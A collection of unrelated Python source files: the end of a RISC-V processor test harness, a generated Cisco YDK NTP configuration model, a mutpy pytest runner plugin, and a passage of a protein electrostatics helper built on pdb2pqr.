env=dict(os.environ), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Building freebsd"),
run(['make'],cwd=config.freebsd_folder,
env=dict(os.environ), stdout=PIPE, stderr=PIPE))
# Common debian test parts
def build_debian(config, debian_linux_config_path):
user = run("whoami", stdout=PIPE)
if "root" in user.stdout.decode():
run_and_log(print_and_log("Cleaning bootmem program directory"),
run(['make','clean'],cwd=config.debian_folder,
env=dict(os.environ, LINUX_CONFIG=debian_linux_config_path), stdout=PIPE, stderr=PIPE))
else:
run_and_log(print_and_log("Cleaning bootmem program directory - this will prompt for sudo"),
run(['sudo','make','clean'],cwd=config.debian_folder,
env=dict(os.environ, LINUX_CONFIG=debian_linux_config_path), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Compiling debian, this might take a while"),
run(['make', 'debian'],cwd=config.debian_folder,
env=dict(os.environ, LINUX_CONFIG=debian_linux_config_path), stdout=PIPE, stderr=PIPE))
# Common busybox test parts
def build_busybox(config, linux_config_path):
run_and_log(print_and_log("Cleaning bootmem program directory"),
run(['make','clean'],cwd=config.busybox_folder,
env=dict(os.environ, LINUX_CONFIG=linux_config_path), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Compiling busybox, this might take a while"),
run(['make'],cwd=config.busybox_folder,
env=dict(os.environ, LINUX_CONFIG=linux_config_path), stdout=PIPE, stderr=PIPE))
# Initialize processor test, set logging etc
def test_init():
parser = argparse.ArgumentParser()
parser.add_argument("proc_name", help="processor to test [chisel_p1|chisel_p2|chisel_p3|bluespec_p1|bluespec_p2|bluespec_p3]")
parser.add_argument("--isa", help="run ISA tests",action="store_true")
parser.add_argument("--busybox", help="run Busybox OS",action="store_true")
parser.add_argument("--debian", help="run Debian OS",action="store_true")
parser.add_argument("--linux", help="run Debian OS",action="store_true")
parser.add_argument("--freertos", help="run FreeRTOS OS",action="store_true")
parser.add_argument("--freebsd", help="run FreeBSD OS",action="store_true")
parser.add_argument("--network", help="run network tests",action="store_true")
parser.add_argument("--io", help="run IO tests (P1 only)",action="store_true")
parser.add_argument("--flash", help="run flash tests",action="store_true")
parser.add_argument("--no-pcie", help="build without PCIe support (P2/P3 only)",action="store_true")
parser.add_argument("--no-bitstream",help="do not upload bitstream",action="store_true")
parser.add_argument("--compiler", help="select compiler to use [gcc|clang]",default="gcc")
parser.add_argument("--elf", help="path to an elf file to load and run. Make sure to specify --timeout parameter")
parser.add_argument("--netboot", help="Load file using netboot. Make sure to specify --timeout and --elf parameters",action="store_true")
parser.add_argument("--timeout", help="specify how log to run a binary specified in the --elf argument")
parser.add_argument("--expected", help="specify expected output of the binary specifed in the --elf argument, used for early exit." +
"Can be multiple arguments comma separated: \"c1,c2,c3...\"",default="None")
parser.add_argument("--absent", help="specify absent output of the binary specifed in the --elf argument. Absent content should not be present." +
"Can be multiple arguments comma separated: \"c1,c2,c3...\"",default="None")
parser.add_argument("--simulator", help="run in verilator",action="store_true")
parser.add_argument("--interactive","-i", help="run interactively",action="store_true")
parser.add_argument("--keep-log", help="Don't erase the log file at the beginning of session",action="store_true")
args = parser.parse_args()
# Make all paths in `args` absolute, so we can safely `chdir` later.
if args.elf is not None:
args.elf = os.path.abspath(args.elf)
gfeconfig.check_environment()
if not args.keep_log:
run(['rm','-rf','test_processor.log'])
logging.basicConfig(filename='test_processor.log',level=logging.DEBUG,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
print_and_log("Test processor starting.")
return args
if __name__ == '__main__':
args = test_init()
# Make sure all `subprocess` calls, which use paths relative to this
# script, can find the right files.
os.chdir(os.path.dirname(__file__))
config = gfeconfig.Config(args)
if args.simulator:
test_simulator(config)
if args.no_bitstream or args.flash:
print_and_log("Skiping bitstream programming")
else:
test_program_bitstream(config)
# Load elf via GDB
if args.elf:
if not args.timeout:
raise RuntimeError("Please specify timeout for how long to run the binary")
if args.expected == "None":
expected = []
else:
expected = args.expected.split(',')
if args.absent == "None":
absent = []
else:
absent = args.absent.split(',')
if args.netboot:
load_netboot(config, args.elf, int(args.timeout), args.interactive, expected, absent)
else:
load_elf(config, args.elf, int(args.timeout), args.interactive, expected, absent)
if args.isa:
test_isa(config)
if args.freertos:
test_freertos(config, args)
if args.busybox:
test_busybox(config, args)
if args.debian:
test_debian(config, args)
if args.freebsd:
test_freebsd(config, args)
print_and_log('Finished!')
|
""" ntp
This module contains definitions
for the Calvados model objects.
This module contains a collection of YANG definitions
for Cisco IOS\-XR syadmin NTP configuration.
This module contains definitions
for the following management objects\:
NTP configuration data
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
Copyright (c) 2012\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Ntp(_Entity_):
"""
.. attribute:: peer
**type**\: list of :py:class:`Peer <ydk.models.cisco_ios_xr.ntp.Ntp.Peer>`
.. attribute:: server
**type**\: list of :py:class:`Server <ydk.models.cisco_ios_xr.ntp.Ntp.Server>`
.. attribute:: trusted_key
**type**\: list of int
**range:** 1..65534
.. attribute:: authenticate
**type**\: :py:class:`Empty<ydk.types.Empty>`
.. attribute:: authentication_key
**type**\: list of :py:class:`AuthenticationKey <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey>`
.. attribute:: trace
**type**\: :py:class:`Trace <ydk.models.cisco_ios_xr.ntp.Ntp.Trace>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp, self).__init__()
self._top_entity = None
self.yang_name = "ntp"
self.yang_parent_name = "ntp"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("peer", ("peer", Ntp.Peer)), ("server", ("server", Ntp.Server)), ("authentication-key", ("authentication_key", Ntp.AuthenticationKey)), ("trace", ("trace", Ntp.Trace))])
self._leafs = OrderedDict([
('trusted_key', (YLeafList(YType.int32, 'trusted-key'), ['int'])),
('authenticate', (YLeaf(YType.empty, 'authenticate'), ['Empty'])),
])
self.trusted_key = []
self.authenticate = None
self.trace = Ntp.Trace()
self.trace.parent = self
self._children_name_map["trace"] = "trace"
self.peer = YList(self)
self.server = YList(self)
self.authentication_key = YList(self)
self._segment_path = lambda: "ntp:ntp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp, ['trusted_key', 'authenticate'], name, value)
class Peer(_Entity_):
"""
.. attribute:: name (key)
**type**\: str
.. attribute:: version
**type**\: int
**range:** 1..4
.. attribute:: key_id
**type**\: int
**range:** 1..65534
.. attribute:: prefer
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Peer, self).__init__()
self.yang_name = "peer"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('version', (YLeaf(YType.int32, 'version'), ['int'])),
('key_id', (YLeaf(YType.int32, 'key-id'), ['int'])),
('prefer', (YLeaf(YType.empty, 'prefer'), ['Empty'])),
])
self.name = None
self.version = None
self.key_id = None
self.prefer = None
self._segment_path = lambda: "peer" + "[name='" + str(self.name) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Peer, ['name', 'version', 'key_id', 'prefer'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Peer']['meta_info']
class Server(_Entity_):
"""
.. attribute:: name (key)
**type**\: str
.. attribute:: version
**type**\: int
**range:** 1..4
.. attribute:: key_id
**type**\: int
**range:** 1..65534
.. attribute:: prefer
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Server, self).__init__()
self.yang_name = "server"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('version', (YLeaf(YType.int32, 'version'), ['int'])),
('key_id', (YLeaf(YType.int32, 'key-id'), ['int'])),
('prefer', (YLeaf(YType.empty, 'prefer'), ['Empty'])),
])
self.name = None
self.version = None
self.key_id = None
self.prefer = None
self._segment_path = lambda: "server" + "[name='" + str(self.name) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Server, ['name', 'version', 'key_id', 'prefer'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Server']['meta_info']
class AuthenticationKey(_Entity_):
"""
.. attribute:: key_number (key)
**type**\: int
**range:** 1..65534
.. attribute:: md5_keyword
**type**\: :py:class:`Md5Keyword <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey.Md5Keyword>`
**mandatory**\: True
.. attribute:: encryption
**type**\: :py:class:`Encryption <ydk.models.cisco_ios_xr.ntp.Ntp.AuthenticationKey.Encryption>`
.. attribute:: keyname
**type**\: str
**length:** 0..32
**mandatory**\: True
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.AuthenticationKey, self).__init__()
self.yang_name = "authentication-key"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['key_number']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_number', (YLeaf(YType.int32, 'key-number'), ['int'])),
('md5_keyword', (YLeaf(YType.enumeration, 'md5-keyword'), [('ydk.models.cisco_ios_xr.ntp', 'Ntp', 'AuthenticationKey.Md5Keyword')])),
('encryption', (YLeaf(YType.enumeration, 'encryption'), [('ydk.models.cisco_ios_xr.ntp', 'Ntp', 'AuthenticationKey.Encryption')])),
('keyname', (YLeaf(YType.str, 'keyname'), ['str'])),
])
self.key_number = None
self.md5_keyword = None
self.encryption = None
self.keyname = None
self._segment_path = lambda: "authentication-key" + "[key-number='" + str(self.key_number) + "']"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.AuthenticationKey, ['key_number', 'md5_keyword', 'encryption', 'keyname'], name, value)
class Encryption(Enum):
"""
Encryption (Enum Class)
.. data:: clear = 0
.. data:: encrypted = 1
"""
clear = Enum.YLeaf(0, "clear")
encrypted = Enum.YLeaf(1, "encrypted")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey.Encryption']
class Md5Keyword(Enum):
"""
Md5Keyword (Enum Class)
.. data:: md5 = 0
"""
md5 = Enum.YLeaf(0, "md5")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey.Md5Keyword']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.AuthenticationKey']['meta_info']
class Trace(_Entity_):
"""
.. attribute:: ntp_helper
**type**\: :py:class:`NtpHelper <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace, self).__init__()
self.yang_name = "trace"
self.yang_parent_name = "ntp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ntp_helper", ("ntp_helper", Ntp.Trace.NtpHelper))])
self._leafs = OrderedDict()
self.ntp_helper = Ntp.Trace.NtpHelper()
self.ntp_helper.parent = self
self._children_name_map["ntp_helper"] = "ntp_helper"
self._segment_path = lambda: "trace"
self._absolute_path = lambda: "ntp:ntp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace, [], name, value)
class NtpHelper(_Entity_):
"""
.. attribute:: trace
show traceable processes
**type**\: list of :py:class:`Trace_ <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper, self).__init__()
self.yang_name = "ntp_helper"
self.yang_parent_name = "trace"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("trace", ("trace", Ntp.Trace.NtpHelper.Trace_))])
self._leafs = OrderedDict()
self.trace = YList(self)
self._segment_path = lambda: "ntp_helper"
self._absolute_path = lambda: "ntp:ntp/trace/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper, [], name, value)
class Trace_(_Entity_):
"""
show traceable processes
.. attribute:: buffer (key)
**type**\: str
**config**\: False
.. attribute:: location
**type**\: list of :py:class:`Location <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_, self).__init__()
self.yang_name = "trace"
self.yang_parent_name = "ntp_helper"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['buffer']
self._child_classes = OrderedDict([("location", ("location", Ntp.Trace.NtpHelper.Trace_.Location))])
self._leafs = OrderedDict([
('buffer', (YLeaf(YType.str, 'buffer'), ['str'])),
])
self.buffer = None
self.location = YList(self)
self._segment_path = lambda: "trace" + "[buffer='" + str(self.buffer) + "']"
self._absolute_path = lambda: "ntp:ntp/trace/ntp_helper/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_, ['buffer'], name, value)
class Location(_Entity_):
"""
.. attribute:: location_name (key)
**type**\: str
**config**\: False
.. attribute:: all_options
**type**\: list of :py:class:`AllOptions <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location.AllOptions>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location, self).__init__()
self.yang_name = "location"
self.yang_parent_name = "trace"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['location_name']
self._child_classes = OrderedDict([("all-options", ("all_options", Ntp.Trace.NtpHelper.Trace_.Location.AllOptions))])
self._leafs = OrderedDict([
('location_name', (YLeaf(YType.str, 'location_name'), ['str'])),
])
self.location_name = None
self.all_options = YList(self)
self._segment_path = lambda: "location" + "[location_name='" + str(self.location_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location, ['location_name'], name, value)
class AllOptions(_Entity_):
"""
.. attribute:: option (key)
**type**\: str
**config**\: False
.. attribute:: trace_blocks
**type**\: list of :py:class:`TraceBlocks <ydk.models.cisco_ios_xr.ntp.Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions, self).__init__()
self.yang_name = "all-options"
self.yang_parent_name = "location"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['option']
self._child_classes = OrderedDict([("trace-blocks", ("trace_blocks", Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks))])
self._leafs = OrderedDict([
('option', (YLeaf(YType.str, 'option'), ['str'])),
])
self.option = None
self.trace_blocks = YList(self)
self._segment_path = lambda: "all-options" + "[option='" + str(self.option) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions, ['option'], name, value)
class TraceBlocks(_Entity_):
"""
.. attribute:: data
Trace output block
**type**\: str
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks, self).__init__()
self.yang_name = "trace-blocks"
self.yang_parent_name = "all-options"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('data', (YLeaf(YType.str, 'data'), ['str'])),
])
self.data = None
self._segment_path = lambda: "trace-blocks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks, ['data'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location.AllOptions.TraceBlocks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location.AllOptions']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_.Location']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper.Trace_']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace.NtpHelper']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp.Trace']['meta_info']
def clone_ptr(self):
self._top_entity = Ntp()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['Ntp']['meta_info']
class ClockAction(_Entity_):
"""
.. attribute:: clock
**type**\: :py:class:`Clock <ydk.models.cisco_ios_xr.ntp.ClockAction.Clock>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction, self).__init__()
self._top_entity = None
self.yang_name = "clock-action"
self.yang_parent_name = "ntp"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("clock", ("clock", ClockAction.Clock))])
self._leafs = OrderedDict()
self.clock = ClockAction.Clock()
self.clock.parent = self
self._children_name_map["clock"] = "clock"
self._segment_path = lambda: "ntp:clock-action"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ClockAction, [], name, value)
class Clock(_Entity_):
"""
.. attribute:: action
**type**\: :py:class:`Action <ydk.models.cisco_ios_xr.ntp.ClockAction.Clock.Action>`
**config**\: False
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction.Clock, self).__init__()
self.yang_name = "clock"
self.yang_parent_name = "clock-action"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("Action", ("action", ClockAction.Clock.Action))])
self._leafs = OrderedDict()
self.action = ClockAction.Clock.Action()
self.action.parent = self
self._children_name_map["action"] = "Action"
self._segment_path = lambda: "clock"
self._absolute_path = lambda: "ntp:clock-action/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ClockAction.Clock, [], name, value)
class Action(_Entity_):
"""
"""
_prefix = 'ntp'
_revision = '2016-07-04'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ClockAction.Clock.Action, self).__init__()
self.yang_name = "Action"
self.yang_parent_name = "clock"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict()
self._segment_path = lambda: "Action"
self._absolute_path = lambda: "ntp:clock-action/clock/%s" % self._segment_path()
self._is_frozen = True
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction.Clock.Action']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction.Clock']['meta_info']
def clone_ptr(self):
self._top_entity = ClockAction()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _ntp as meta
return meta._meta_table['ClockAction']['meta_info']
|
import pytest
from _pytest.config import default_plugins
from mutpy.test_runners.base import BaseTestSuite, BaseTestRunner, MutationTestResult, CoverageTestResult, BaseTest
class PytestMutpyPlugin:
def __init__(self, skipped_tests):
self.skipped_tests = skipped_tests
self.mutation_test_result = MutationTestResult()
def has_failed_before(self, nodeid):
return next((test for test in self.mutation_test_result.failed if test.name == nodeid), None) is not None
def has_been_skipped_before(self, nodeid):
return next((test for test in self.mutation_test_result.skipped if test.name == nodeid), None) is not None
def pytest_collection_modifyitems(self, items):
for item in items:
if item.nodeid in self.skipped_tests:
item.add_marker(pytest.mark.skip)
def pytest_runtest_logreport(self, report):
if report.skipped:
self.mutation_test_result.add_skipped(report.nodeid)
elif report.failed and not self.has_failed_before(report.nodeid):
if 'TypeError' in report.longrepr.reprcrash.message:
self.mutation_test_result.set_type_error(TypeError(str(report.longrepr.reprcrash)))
else:
if not hasattr(report, 'longreprtext'):
with open("Output.txt", "w") as text_file:
text_file.write(report.nodeid + ' ' + vars(report))
self.mutation_test_result.add_failed(report.nodeid, report.longrepr.reprcrash.message.splitlines()[0],
report.longreprtext)
elif report.passed and report.when == 'teardown' and not self.has_failed_before(report.nodeid) \
and not self.has_been_skipped_before(report.nodeid):
self.mutation_test_result.add_passed(report.nodeid)
class PytestMutpyCoveragePlugin:
def __init__(self, coverage_injector):
self.current_test = None
self.coverage_result = CoverageTestResult(coverage_injector=coverage_injector)
def pytest_runtest_setup(self, item):
self.coverage_result.start_measure_coverage()
self.current_test = item
def pytest_runtest_teardown(self, nextitem):
self.coverage_result.stop_measure_coverage(PytestTest(self.current_test))
self.current_test = None
class PytestMutpyTestDiscoveryPlugin:
def __init__(self):
self.tests = []
def pytest_collection_modifyitems(self, items):
for item in items:
self.tests.append(item)
class PytestTestSuite(BaseTestSuite):
def __init__(self):
self.tests = set()
self.skipped_tests = set()
def add_tests(self, test_module, target_test):
if target_test:
self.tests.add('{0}::{1}'.format(test_module.__file__, target_test))
elif hasattr(test_module, '__file__'):
self.tests.add(test_module.__file__)
else:
self.tests.add(test_module.__name__)
def skip_test(self, test):
self.skipped_tests.add(test.internal_test_obj.nodeid)
def run(self):
mutpy_plugin = PytestMutpyPlugin(skipped_tests=self.skipped_tests)
pytest.main(args=list(self.tests) + ['-x', '-p', 'no:terminal'], plugins=list(default_plugins) + [mutpy_plugin])
return mutpy_plugin.mutation_test_result
def run_with_coverage(self, coverage_injector=None):
mutpy_plugin = PytestMutpyCoveragePlugin(coverage_injector=coverage_injector)
pytest.main(list(self.tests) + ['-p', 'no:terminal'], plugins=list(default_plugins) + [mutpy_plugin])
return mutpy_plugin.coverage_result
def __iter__(self):
mutpy_plugin = PytestMutpyTestDiscoveryPlugin()
pytest.main(args=list(self.tests) + ['--collect-only', '-p', 'no:terminal'],
plugins=list(default_plugins) + [mutpy_plugin])
for test in mutpy_plugin.tests:
yield PytestTest(test)
class PytestTest(BaseTest):
def __repr__(self):
return self.internal_test_obj.nodeid
def __init__(self, internal_test_obj):
self.internal_test_obj = internal_test_obj
class PytestTestRunner(BaseTestRunner):
test_suite_cls = PytestTestSuite
|
# Copyright (c) 2022, Sabine Reisser
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import pdb2pqr
import re
import numpy as np
from config import *
import subprocess
import logging
logger = logging.getLogger(__name__)
def generate_3letter_code(seq, pH=7., nterm='N', cterm='C'):
aa_map = {
"A": "ALA",
"C": "CYS",
"D": "ASP",
"E": "GLU",
"F": "PHE",
"G": "GLY",
"H": "HIS",
"I": "ILE",
"K": "LYS",
"L": "LEU",
"M": "MET",
"N": "ASN",
"P": "PRO",
"Q": "GLN",
"R": "ARG",
"S": "SER",
"T": "THR",
"U": "SEC",
"V": "VAL",
"W": "TRP",
"Y": "TYR"
}
aa_ph_dependent = {
# R
"K" : [ 12.1, 'LYS', 'LYN'],
"H" : [ 6.04, 'HIS', 'HID'],
"E" : [ 4.15, 'GLH', 'GLU'],
"D" : [ 3.71, 'ASH', 'ASP'],
"C" : [ 8.14, 'CYS', 'CYM']
# Y
}
three_letter_seq = []
for letter in seq:
if letter in aa_ph_dependent:
if pH < aa_ph_dependent[letter][0]:
three_letter_seq.append(aa_ph_dependent[letter][1])
else:
three_letter_seq.append(aa_ph_dependent[letter][2])
else:
three_letter_seq.append(aa_map[letter])
seq_numbers = np.arange(1, len(seq)).astype(str)
# take care of termini
three_letter_seq[0] = f'{nterm}{three_letter_seq[0]}'
three_letter_seq[-1] = f'{cterm}{three_letter_seq[-1]}'
return " ".join(three_letter_seq), " ".join(seq_numbers)
def read_sequence(fname):
with open(fname, 'r') as f:
content = f.read()
result = re.findall('^[A-Za-z\s\n]+$', content, flags=re.MULTILINE)
sequence = ''.join(result[0].split()).upper()
if not sequence:
raise BaseException(f'Could not find valid sequence in {fname}')
non_canonical_amino_acids = re.compile('.*[BJXO].*')
if non_canonical_amino_acids.match(sequence):
raise BaseException('Found non-canonical amino acid (BJXO)'
' in sequence. Aborting.')
return sequence
def create_pdb(sequence, output):
three_letter_seq, seq_numbers = generate_3letter_code(sequence)
output_pdb = f'{output}.pdb'
with open(f'{DIR_3DHM}/templates/tleap_load.txt', 'r') as template:
temp = template.read()
tlp = temp.replace('SEQUENCE', three_letter_seq)
tlp = tlp.replace('SEQ_NUMBERS', seq_numbers)
tlp = tlp.replace('OUTPUT', output_pdb)
tlp_file = 'tleap.in'
with open(tlp_file, 'w') as f:
f.write(tlp)
with open(f'{output}.tleap_out', 'w') as out:
return_code = subprocess.run([BIN_TLEAP, '-f', tlp_file],
stdout=out,
stderr=subprocess.STDOUT
)
return output_pdb
def generate_apbs_input(pqr, output):
size_obj = pdb2pqr.psize.Psize()
size_obj.run_psize(pqr)
input = pdb2pqr.inputgen.Input(pqr, size_obj, 'mg-auto', False, potdx=True)
input.print_input_files(output)
def run_pdb2pqr(pdb_file, output, args):
pqr_file = f'{output}.pqr'
pdb2pqr_parser = pdb2pqr.main.build_main_parser()
pdb2pqr_args = ['--apbs-input=apbs.in']
if not args.ff or args.ff == 'custom':
pdb2pqr_args += [
f'--userff={DIR_3DHM}/dat/{args.ff}.DAT',
f'--usernames={DIR_3DHM}/dat/{args.ff}.names'
]
else:
pdb2pqr_args += [f'--ff={args.ff}']
if args.neutraln:
if protonated(pdb_file):
logger.warning('File is already protonated, cannot change N-terminus')
else:
pdb2pqr_args.append('--neutraln')
if args.neutralc:
if protonated(pdb_file):
logger.warning('File is already protonated, '
'cannot change C-terminus')
else:
pdb2pqr_args.append('--neutralc')
params = pdb2pqr_parser.parse_args(
pdb2pqr_args +
[
pdb_file,
pqr_file
]
)
print(pdb2pqr_args)
# Loading topology files
definition = pdb2pqr.io.get_definitions()
pdblist, is_cif = pdb2pqr.io.get_molecule(pdb_file)
# drop water
pdblist = pdb2pqr.main.drop_water(pdblist)
# Setting up molecule
biomolecule, definition, ligand = pdb2pqr.main.setup_molecule(
pdblist, definition, None
)
# Setting termini states for biomolecule chains
biomolecule.set_termini(params.neutraln, params.neutralc)
results = pdb2pqr.main.non_trivial(
args=params,
biomolecule=biomolecule,
ligand=ligand,
definition=definition,
is_cif=is_cif,
)
pdb2pqr.main.print_pqr(
args=params,
pqr_lines=results["lines"],
header_lines=results["header"],
missing_lines=results["missed_residues"],
is_cif=is_cif,
)
if params.apbs_input:
pdb2pqr.io.dump_apbs(params.output_pqr, params.apbs_input)
# logging.basicConfig(level=20)
return pqr_file
def pqr2xyzr(pqr_file, output):
pqrfile_handle = open(pqr_file, "r")
pqrfile_content = pqrfile_handle.readlines()
pqrfile_handle.close()
xyzr_name = f'{output}.xyzr'
re_pqr = re.compile(
"^ATOM\s{2}([0-9\s]{5})\s([A-Z0-9\s]{4}).([A-Z\s]{4}).([\-0-9\s]{4})"
".\s{3}([0-9\-\.\s]{8})([0-9\-\.\s]{8})([0-9\-\.\s]{8})\s+([0-9\.\-]+)"
"\s+([0-9\.\-]+)\s*$")
total_charge = 0.
xyzrfile_content = ""
res_charge = 0
old_res = 0
for line in pqrfile_content:
atom = re_pqr.match(line)
if atom:
x = float(atom.group(5))
y = float(atom.group(6))
z = float(atom.group(7))
radius = float(atom.group(9))
xyzrfile_content += "%f %f %f %f\n" % (x, y, z, radius)
# check charge
total_charge += float(atom.group(8))
res = atom.group(4)
if res != old_res:
print(f'{atom.group(4)}, {np.round(res_charge, 4)}')
